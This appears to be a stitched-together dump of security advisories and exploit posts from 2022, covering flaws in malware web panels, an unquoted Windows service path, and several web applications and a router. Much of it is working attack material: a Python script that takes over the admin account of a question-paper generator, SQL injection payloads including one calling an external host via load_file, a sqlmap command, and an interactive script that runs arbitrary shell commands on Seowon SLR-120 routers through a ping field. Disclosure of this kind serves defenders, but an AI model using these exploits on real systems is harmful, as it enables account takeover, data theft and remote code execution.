<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/c4cc1317aea42f7dd4a1b786c5278a24_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Hades RAT - Web Panel<br />Vulnerability: Information Disclosure<br />Description: The Hades Rat web-panel listens on Port 80. There is no authentication check or default .htaccess file protecting the root directory. Third-party attackers who can reach the web-panel can read the INI file disclosing the password.<br />Family: Hades<br />Type: WebUI<br />MD5: c4cc1317aea42f7dd4a1b786c5278a24<br />MD5: a117b7fa4691b766dd5aa6455438fded (strings.ini)<br />Vuln ID: MVID-2022-0513<br />Disclosure: 03/13/2022<br /><br />Exploit/PoC:<br />C:\>curl http://HADES_RAT_IP/WebPanel/strings.ini<br />[identifiant]<br />mdp = "megapass"<br /><br />[strings]<br />error_mdp = "Error Password False..."<br /><br />form_mdp = "Please put your password."<br />form_valid = "Send !"<br /><br />com_header = "Write your commands for your bot(s)"<br />com1 = "DDOS Commands (ex: 127.0.0.1)"<br />com2 = "Download / Execute Commands (ex: http://www.site.com/dl.exe)"<br />com3 = "Stop DDOS or Restart Commands (ex: Restart)"<br /><br />titre = "Hadès RAT - WebPanel"<br /><br />[images]<br />header = "images/header.png"<br />header_mdp = "images/lock.png"<br />C:\><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/c4cc1317aea42f7dd4a1b786c5278a24.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Hades RAT - Web Panel<br />Vulnerability: Insecure Credential Storage<br />Family: Hades<br />Type: WebUI<br />MD5: c4cc1317aea42f7dd4a1b786c5278a24<br />MD5: a117b7fa4691b766dd5aa6455438fded (strings.ini)<br />Vuln ID: MVID-2022-0512<br />Disclosure: 03/13/2022<br />Description: The Hades Rat malware web-panel listens on Port 80 and stores its weak password "megapass" in plaintext in the strings.ini file.<br /><br />Exploit/PoC:<br />"strings.ini"<br /><br />[identifiant]<br />mdp = "megapass"<br /><br />[strings]<br />error_mdp = "Error Password False..."<br /><br />form_mdp = "Please put your password."<br />form_valid = "Send !"<br /><br />com_header = "Write your commands for your bot(s)"<br />....<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/baf102927947289e4d589028620ce291.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: RedLine.MainPanel - cracked.exe<br />Vulnerability: Insecure Permissions<br />Description: The malware writes PE files with insecure permissions to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Family: RedLine<br />Type: PE32<br />MD5: baf102927947289e4d589028620ce291<br />Vuln ID: MVID-2022-0511<br />Disclosure: 03/13/2022<br /><br />Exploit/PoC:<br />C:\>cacls Build.exe<br />C:\Build.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir Build.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />03/04/2022 02:24 AM 144,384 Build.exe<br /> 1 File(s) 144,384 bytes<br /> 0 Dir(s) 25,982,451,712 bytes free<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Automatic Question Paper Generator System 1.0 - Cross-site scripting stored<br /># Date: 2022-11-03<br /># Exploit Author: Mr Empy<br /># Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />Automatic Question Paper Generator System 1.0 - Cross-site scripting stored<br /><br /><br />Summary:<br />================<br />The Automatic Question Paper Generator in version 1.0 is vulnerable to<br />arbitrary persistent javascript code injection (XSS), which can lead to<br />thwarting of browser resources and session cookie theft.<br /><br /><br />Severity Level:<br />================<br />7.5 (High)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N<br /><br /><br />Affected Product:<br />================<br />Automatic Question Paper Generator v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. Open your browser, create an account on the site and log into it (<br />http://target.com/aqpg/users/login.php).<br /><br />2. Click on your profile icon and then click on My Account. The field<br />called "First Name", "Middle Name", "Last Name" are vulnerable to XSS,<br />inject the payload into one of them and then save your changes.<br /></code></pre>
<pre><code># Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path<br /># Date: 11/03/2022<br /># Exploit Author: Faisal Alasmari <br /># Vendor Homepage: https://www.vive.com/<br /># Software Link: https://developer.vive.com/resources/downloads/<br /># Version: 1.0.0.4<br /># Tested: Windows 10 x64<br /><br /><br /><br />C:\Users\User>sc qc "VIVE Runtime Service"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: VIVE Runtime Service<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : VIVE Runtime Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code># Exploit Title: Automatic Question Paper Generator System 1.0 - Authentication Bypass<br /># Date: 2022-04-03<br /># Exploit Author: Mr Empy<br /># Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Linux<br />#!/usr/bin/env python3<br />import requests<br />import random<br />import string<br />from requests_toolbelt import MultipartEncoder<br />from time import sleep<br />import argparse<br /><br />def banner():<br /> print('''<br /> ___ ____ ____ ______<br /> / | / __ \ / __ \/ ____/<br /> / /| |/ / / / / /_/ / / __<br /> / ___ / /_/ / / ____/ /_/ /<br /> /_/ |_\___\_\/_/ \____/<br /><br />[Automatic Question Paper Generator v1.0]<br /> [Authentication Bypass]<br />''')<br /><br />def main():<br /> fields = {<br /> 'id': "1",<br /> 'firstname': 'Adminstrator',<br /> 'lastname': 'Admin',<br /> 'username': 'admin',<br /> 'password': arguments.newpassword<br /> }<br /><br /> boundary = '----WebKitFormBoundary' +<br />''.join(random.sample(string.ascii_letters + string.digits, 16))<br /> m = MultipartEncoder(fields=fields, boundary=boundary)<br /><br /> headers = {<br /> "Connection": "keep-alive",<br /> "Content-Type": m.content_type<br /> }<br /><br /> r = requests.post(f'{arguments.url}/classes/Users.php?f=save',<br />headers=headers, data=m)<br /> if '1' in r.text:<br /> print(f'[+] Account taken successfully! Login:<br />admin:{arguments.newpassword}')<br /> else:<br /> print('[-] Not vulnerable')<br /><br />if __name__ == '__main__':<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-u','--url', action='store', help='Target URL (<br />http://target.com/aqpg/)', dest='url', required=True)<br /> parser.add_argument('-p','--password', action='store', help='New<br />password', dest='newpassword', required=True)<br /> arguments = parser.parse_args()<br /> banner()<br /> sleep(2)<br /> main()<br /></code></pre>
<pre><code>## Title: Student Grading System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 03.14.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Student-Grading-System<br /><br />## Description:<br />The `user` parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the user parameter, and a database<br />error message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br />You should review the contents of the error message, and the<br />application's handling of other input, to confirm whether a<br />vulnerability is present.<br />The attacker can take administrator account control and also of all<br />accounts and files information on this system, also the malicious user<br />can download all information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: user (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: user=-6693' OR 2950=2950-- qPwW&pwd=d0Y!w7s!B1<br /><br /> Type: UNION query<br /> Title: Generic UNION query (random number) - 6 columns<br /> Payload: user=-7952' UNION ALL SELECT<br />5650,5650,CONCAT(0x71786a7a71,0x7564497973726b65496f6e5778706143684359517149546e46776d6843484a504e624e7967484c57,0x716b627171),5650,5650,5650--<br />-&pwd=d0Y!w7s!B1<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Student-Grading-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/h0x4xl)<br /><br /><br /></code></pre>
<pre><code>## Title: Insurance Management System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 03.12.2022<br />## Vendor: https://itsourcecode.com/free-projects/php-project/php-projects-source-code-free-downloads/<br />## Software: https://itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/itsourcecode.com/Insurance-Management-System<br /><br />## Description:<br />The username parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\xek'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator account control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: username=GvWNfNIz'+(select<br />load_file('\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\xek'))+''<br />AND 7122=(SELECT (CASE WHEN (7122=7122) THEN 7122 ELSE (SELECT 6385<br />UNION SELECT 2068) END))-- -&password=y6E!b3n!T9<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=GvWNfNIz'+(select<br />load_file('\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\xek'))+''<br />AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x7178767671,(SELECT<br />(ELT(3405=3405,1))),0x7178627871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zJzm&password=y6E!b3n!T9<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=GvWNfNIz'+(select<br />load_file('\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\xek'))+''<br />AND (SELECT 5739 FROM (SELECT(SLEEP(5)))crqV)--<br />pBFE&password=y6E!b3n!T9<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/itsourcecode.com/Insurance-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/iyml42)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Baixar GLPI Project 9.4.6 - SQLi<br /># Date: 10/12<br /># Exploit Author: Joas Antonio<br /># Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/<br /># Software Link: https://glpi-project.org/pt-br/baixar/<br /># Version: GLPI - 9.4.6<br /># Tested on: Windows/Linux<br /># CVE : CVE-2021-44617<br /><br />#POC1:<br />plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111<br /><br />sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"<br /><br /></code></pre>
<pre><code># Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)<br /># Date: 2022-03-11<br /># Exploit Author: Aryan Chehreghani<br /># Vendor Homepage: http://www.seowonintech.co.kr<br /># Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30<br /># Version: All version<br /># Tested on: Windows 10 Enterprise x64 , Linux<br /># CVE : CVE-2020-17456<br /><br /># [ About - Seowon SLR-120 router ]:<br /><br />#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,<br />#The convenience of sharing wireless internet access invigorates your lifestyle, families,<br />#friends and workmates. Carry it around to boost your active communication anywhere.<br /><br /># [ Description ]:<br /><br />#Execute commands without authentication as admin user ,<br />#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.<br /><br /># [ Vulnerable products ]:<br /><br />#SLR-120S42G<br />#SLR-120D42G<br />#SLR-120T42G<br /><br />import requests<br /><br />print ('''<br />########################################################### <br /># Seowon SLR-120S42G router - RCE (Unauthenticated) #<br /># BY:Aryan Chehreghani #<br /># Team:TAPESH DIGITAL SECURITY TEAM IRAN #<br /># mail:aryanchehreghani@yahoo.com # <br /># -+-USE:python script.py #<br /># Example Target : http://192.168.1.1:443/ #<br />###########################################################<br />''')<br /><br />url = input ("=> Enter Target : ")<br /><br />while(True):<br /><br /> try:<br /> <br /> cmd = input ("~Enter Command $ ")<br /> <br /> header = {<br />"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",<br />"Accept": "*/*",<br />"Accept-Language": "en-US,en;q:0.5",<br />"Accept-Encoding": "gzip, deflate",<br />"Content-Type": "application/x-www-form-urlencoded",<br />"Content-Length": "207",<br />"Origin": "http://192.168.1.1",<br />"Connection": "close",<br />"Referer": "http://192.168.1.1/",<br />"Upgrade-Insecure-Requests": "1"<br />}<br /><br /> datas = {<br />'Command':'Diagnostic',<br />'traceMode':'ping',<br />'reportIpOnly':'',<br />'pingIpAddr':';'+cmd,<br />'pingPktSize':'56',<br />'pingTimeout':'30',<br />'pingCount':'4',<br />'maxTTLCnt':'30',<br />'queriesCnt':'3',<br />'reportIpOnlyCheckbox':'on',<br />'logarea':'com.cgi',<br />'btnApply':'Apply',<br />'T':'1646950471018'<br />}<br /><br /> x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)<br /><br /> print(x.text)<br /><br /> except:<br /> break<br /> <br /></code></pre>
